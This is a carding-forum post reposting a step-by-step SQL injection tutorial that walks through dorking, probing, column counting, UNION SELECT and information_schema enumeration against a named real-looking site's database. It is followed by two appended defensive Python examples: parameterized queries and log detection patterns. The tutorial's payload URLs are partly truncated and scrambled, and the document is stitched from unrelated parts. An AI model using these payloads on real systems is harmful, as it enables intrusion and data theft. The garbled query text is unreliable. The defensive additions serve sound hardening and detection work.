Welcome to DevilGroup - Carding Forum - Free Premium Accounts

Mr Bomb

[SQL Injection Tutorial] Detailed!

1 post in this topic

I found a very good "tutorial" on my hard drive that shows you easily what you can do with a "SQL Injection" ...

It explains "step by step" what you need to do if you have found an "SQL injection" ... in my opinion it is one of the best tutorials on the topic "SQL Injection" ... In this way I would also like to thank "godfather", the author of the tutorial, many times again for taking the time to write the tutorial himself.

So now, have a lot of fun with the tutorial.

Here is a tutorial for the 'pretty simple way of an SQL Injection'

1. Google ~ Dorkz
2. Beginning
3. Order + By
4. Union + Select, version, database
5. Tables
6. Columns
7. Data
8. Thanks for reading

1. Google ~ Dorkz

- Here are a few Google dorks so you can search for SQLi vulns.

SQLI Dorks - ~ ~ XakNet Forum

2. Beginning

- To begin, we first look for a page where we think there is an SQLi vuln.

Example:

Code:

http://modules.t-o-m-e.net/script.php?id=24

Now we simply append an apostrophe to the end of the URL:

Code:

http://modules.t-o-m-e.net/script.php?id=24

'

If an error is returned to us now, we have found a Vuln.

On this example page the error shows up as follows:

Code:

"You have an error in your SQL syntax; check the manual that Corresponds to your MySQL server version for the right syntax to use near '\''at line 1"

3. Order + By

- Now we determine the column number using the SQL command "Order + By":

This tactic works like this:

We ask the server whether it has a certain number of columns; if NOT, the page returns an error (which means the page has FEWER columns than we asked for).

If the site does not raise an error, it means that the page has either this number of columns or more.

For this we append the command "Order + By + number" to the vulnerable URL.

Number stands for the column number we want to query ...

Let's test it right away with an example:

Code:

http://modules.tome.net/script.php?id=24+order+by+10--

TWO MINUS SIGNS ARE ALWAYS APPENDED AT THE END, IN EVERY STEP THAT WE WILL STILL MAKE!

This asks whether the page has 10 columns. -> As a result we get an error, that is, the page does NOT have 10 columns, but fewer.

Now we just try around a bit ...

Code:

http://modules.tome.net/script.php?id=24+order+by+8--

Here NO error is output, which means that the page has 8 columns. If we now try the opposite case:

Code:

http://modules.tome.net/script.php?id=24+order+by+9--

We see that it outputs an error, so now we know: 9 columns = NO, 8 columns = YES

4. Union + Select, version, database

- Now we have found the column number thanks to the command "Order + By".

Column number = 8

We now only have to append this series to the URL, by appending the SQL command "+ union + select + number" to the URL.

Number stands for the number of columns we determined previously.

This is not given as a single number, but as every number from 1 up to the maximum column number. (In this case: 1,2,3,4,5,6,7,8)

Let's test it on our example:

Code:

T.o.M.E. Library - Script 'zangband mutations (20kB)'

Now the individual numbers are spread across the displayed page. As the text of the page usually gets in the way, we set a MINUS behind the ID; this invalidates it:

Example:

To note here is the behind the 24 by MINUS: "id = 24"

Code:

T.o.M.E. Library - Script '2 '

Instead of the numbers we now see on the page, we can have the MySQL version and the database output.

Version command: "Version ()"

Database command: "Database ()"

Now we pick a number that we can see displayed on the page.

For this example I'll take the 2.

To read the version, we replace the "2" in the URL with the version command: "version ()"

Example:

Code:

http://modules.tome.net/script.php?i...union+select+1

, version () ,3,4,5,6,7,8 -

Now the page outputs the following: 5.0.87

This means the MySQL version is: 5.0.87

We are only interested in the first number of the version. If it is 4, it will be harder for us later to read tables and columns, as we would then have to guess them ourselves.

As this page has MySQL version 5, we can have the TABLE_NAME output automatically.

We can do the same with the database command: I take the "2" again and replace it with the database command: "database ()"

Example:

Code:

http://modules.tome.net/script.php?i...union+select+1

, database () ,3,4,5,6,7,8 -

The database name of this site is therefore: darkdb

We should now write the database name down somewhere for the next steps.

5. Tables

- Now we have the column number, the version, and the database name.

If the MySQL version is 5, we can easily have the table names output automatically.

By our count (in this case again, "2") with "GROUP_CONCAT (table_name)" substitute. Furthermore, we now go to the END of the URL and go BEFORE the 2 minus "-" and then use the following: + from + where + + INFORMATION_SCHEMA.TABLES table_schema = 0x "hex Database"

Database-Hex stands for the hex string of the database name:

I wrote a little program that converts the database name to a hex string.

- Simply enter the database name (in this case: darkdb) into the TextBox above, then copy the hex string that appears: 64:61:72:6b:64:62

We then remove the colons from the hex string, which gives us the following string: 6461726b6462

Now all of this once more with an example:

Code:

http://modules.tome.net/script.php?i...union+select+1

, GROUP_CONCAT (table_name), 3,4,5,6, 7,8 + from + where + + INFORMATION_SCHEMA.TABLES table_sc hema 0x6461726b6462 = -

Now several table names are normally listed next to each other; we should note these down somewhere.

6. Columns

- Now we pick a Table_Name whose columns we want to read:

In this example, I'll take the table: phpbb3acl_users -> we again need this as a hex string. We do this again with the tool.

Then we remove the colons again, and we have the following hex string: 70687062623361636c5f7573657273

Now we replace "GROUP_CONCAT (table_name)" with "GROUP_CONCAT (column_name)"

Then we remove from the previous step, the "+ from + where + + INFORMATION_SCHEMA.TABLES table_s chem a = 0x" hex Database "by" + from + where + + information_schema.columns Table_ name = 0x "Table Hex"

In our example it looks like this:

Code:

http://modules.tome.net/script.php?i...union+select+1

, GROUP_CONCAT (column_name), 3,4,5, 6,7,8 + from + where + + information_schema.columns Table_ name = 0x70687062623361636c5f7573657273 -

Now a couple of columns are output again; we should note these down again.

For our example I'll take the following column: user_id

In this table there are unfortunately no User_name or User_passwords, so I'll just take user_id

7. Data

- Now we have a table and a column that we want to read from the table.

To have the data output, we replace "GROUP_CONCAT (column_name)" with "concat (user_id)"

From our previous step, we replace: "+ from + Database.TableName"

Database stands for the normal name of the database, i.e.: darkdb

TableName stands for the normal name of the table we have chosen, that is: phpbb3acl_users

Now we test it on our example:

Code:

http://modules.tome.net/script.php?i...union+select+1

, concat (user_id), 3,4,5,6,7,8 + from + darkdb.phpbb3acl_users--

Now the user_id of the first row is output, in this case: 7

In order to vote in such a list up and down we can hang after the "+ from + darkdb.phpbb3acl_users" nor a "limit + +0.1"

It looks like this:

Code:

http://modules.tome.net/script.php?i...union+select+1

, concat (user_id), 3,4,5,6,7,8 + from + limit + + darkdb.phpbb3acl_users 0.1 -

If we now change the 0 to 1, we go one line up, and we read the next "user_id" made it to 2 if we make a new back up at some point no longer exists.

If we want to read several columns at once, e.g. in this case (forum_id and user_id),

then we simply replace "concat (user_id)" with "concat (user_id, 0x3a, forum_id)"

the 0x3a stands for a colon, then the user_id is separated from the forum_id by a colon.
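
Added example, not part of the original post: why the apostrophe and "order by" inputs in steps 2 and 3 change the page's behaviour when the id is concatenated into the query, and how validation plus a bound parameter removes that signal. It assumes a hypothetical `scripts` table and uses Python's built-in sqlite3 as a stand-in for the MySQL backend.

```python
import re
import sqlite3

def make_db():
    # Constructed stand-in for the site's database: one table, one row.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE scripts (id INTEGER PRIMARY KEY, name TEXT)")
    conn.execute("INSERT INTO scripts VALUES (24, 'sample script')")
    return conn

def lookup_concatenated(conn, raw_id):
    # Vulnerable pattern: the request value is pasted into the SQL text,
    # so quotes and keywords in it are parsed as part of the statement.
    return conn.execute("SELECT name FROM scripts WHERE id = " + raw_id).fetchall()

def lookup_parameterized(conn, raw_id):
    # Hardened pattern: reject anything that is not a plain integer, then
    # bind the value as a parameter so it is never parsed as SQL.
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        return []
    return conn.execute("SELECT name FROM scripts WHERE id = ?", (int(raw_id),)).fetchall()

def outcome(lookup, conn, raw_id):
    # What a client can observe: rows, or a database error. A real handler
    # should log the error and return a generic page, never the SQL message.
    try:
        return ("rows", lookup(conn, raw_id))
    except sqlite3.Error:
        return ("db_error", None)

# Inputs from the post, URL-decoded ("+" is a space in a query string).
PROBES = ["24", "24'", "24 order by 10--"]

def compare(conn):
    # For each input: (outcome kind when concatenated, outcome when bound).
    return {p: (outcome(lookup_concatenated, conn, p)[0],
                outcome(lookup_parameterized, conn, p)) for p in PROBES}

if __name__ == "__main__":
    for probe, result in compare(make_db()).items():
        print(repr(probe), result)
```

With the bound parameter, every malformed id yields the same empty result, so the error/no-error difference that the column-counting step depends on is gone.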
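
Added example, not part of the original post: a detection pass over web access logs that tags the request patterns the steps above leave behind (quote probe, "order by" counting, "union select", information_schema lookups, hex literals) and flags clients that show several of them. The log format, paths, addresses and the `min_stages` threshold are assumptions, and the sample lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# One pattern per step of the post, matched against decoded parameter values.
STAGES = {
    "quote_probe": re.compile(r"^\d+'$"),
    "order_by_count": re.compile(r"\border\s+by\s+\d+", re.I),
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "schema_enum": re.compile(r"\binformation_schema\b", re.I),
    "hex_literal": re.compile(r"\b0x[0-9a-f]{6,}\b", re.I),
}
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) [^"]*" (\d{3})')

def stages_in_target(target):
    """Return the set of stage names seen in one request target."""
    hits = set()
    # parse_qsl decodes "+" and %xx, so encoded probes are matched too.
    for _, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        hits.update(name for name, pat in STAGES.items() if pat.search(value))
    return hits

def flag_clients(lines, min_stages=2):
    """Map client address -> sorted stages, for clients showing several stages."""
    seen = {}
    for line in lines:
        m = LOG_LINE.match(line)
        if m:
            seen.setdefault(m.group(1), set()).update(stages_in_target(m.group(2)))
    return {ip: sorted(s) for ip, s in seen.items() if len(s) >= min_stages}

# Constructed sample log (documentation address ranges, hypothetical paths).
SAMPLE_LOG = """\
203.0.113.7 - - [01/Jan/2024:10:00:01 +0000] "GET /script.php?id=24 HTTP/1.1" 200
203.0.113.7 - - [01/Jan/2024:10:00:05 +0000] "GET /script.php?id=24%27 HTTP/1.1" 500
203.0.113.7 - - [01/Jan/2024:10:00:09 +0000] "GET /script.php?id=24+order+by+10-- HTTP/1.1" 500
203.0.113.7 - - [01/Jan/2024:10:00:12 +0000] "GET /script.php?id=24+order+by+8-- HTTP/1.1" 200
203.0.113.7 - - [01/Jan/2024:10:00:20 +0000] "GET /script.php?id=-24+union+select+1,2,3,4,5,6,7,8-- HTTP/1.1" 200
198.51.100.9 - - [01/Jan/2024:10:01:00 +0000] "GET /script.php?id=31 HTTP/1.1" 200
198.51.100.9 - - [01/Jan/2024:10:01:04 +0000] "GET /search.php?q=order+by+date HTTP/1.1" 200
""".splitlines()

if __name__ == "__main__":
    print(flag_clients(SAMPLE_LOG))
```

Requiring more than one stage per client keeps ordinary searches such as "order by date" from raising an alert on their own.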
